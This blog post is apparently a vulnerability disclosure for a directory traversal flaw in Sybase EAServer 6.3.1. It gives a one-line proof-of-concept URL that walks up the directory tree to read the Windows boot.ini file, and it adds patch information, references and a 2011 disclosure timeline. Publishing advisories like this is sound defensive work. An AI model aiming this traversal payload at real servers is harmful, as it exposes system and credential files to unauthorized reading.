Sybase EAServer is the leading solution for distributed and Web-enabled PowerBuilder applications. EA Server can be used to run multiple websites, portals or Web applications. It allows access from Web browsers and provides a development platform for enterprise Web services.
Sow Ching Shiong, an independent vulnerability researcher has identified a Directory Traversal vulnerability in Sybase EAServer. This issue was discovered in a default installation of Sybase EAServer 6.3.1 Developer Edition running on Windows 2003 Server. Other earlier versions may also be affected.
Proof of concept
http://[target]:8000/images//.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\boot.ini
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4K7amScLu5WD7nL-UX2EBU9ySxu23F_NIyqdBz6pZlZ-qZ654s6maW9LblqhJSN1Cpkk3z0iefa9IMScY31z91hxugXmBu_tgKA_O3gVvSEdYJKu8h_EnTl9_51NTkX3pW_LCQRmlAwy2/s400/Sybase-EA-Server-Dir-Traversal-01.png)
Solution
Sybase has released patches which address this issue. Please see the references for more information.
References
Vendor URL: http://www.sybase.com/detail?id=1093216
iDefense: http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=912
Secunia: http://secunia.com/advisories/44666/
Disclosure Timeline
2011-01-25 - Vulnerability discovered.
2011-01-25 - Vulnerability reported to iDefense.
2011-03-29 - iDefense confirmed the vulnerability and contacted the vendor.
2011-05-23 - Patch released.
2011-05-25 - Advisory published by iDefense.
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.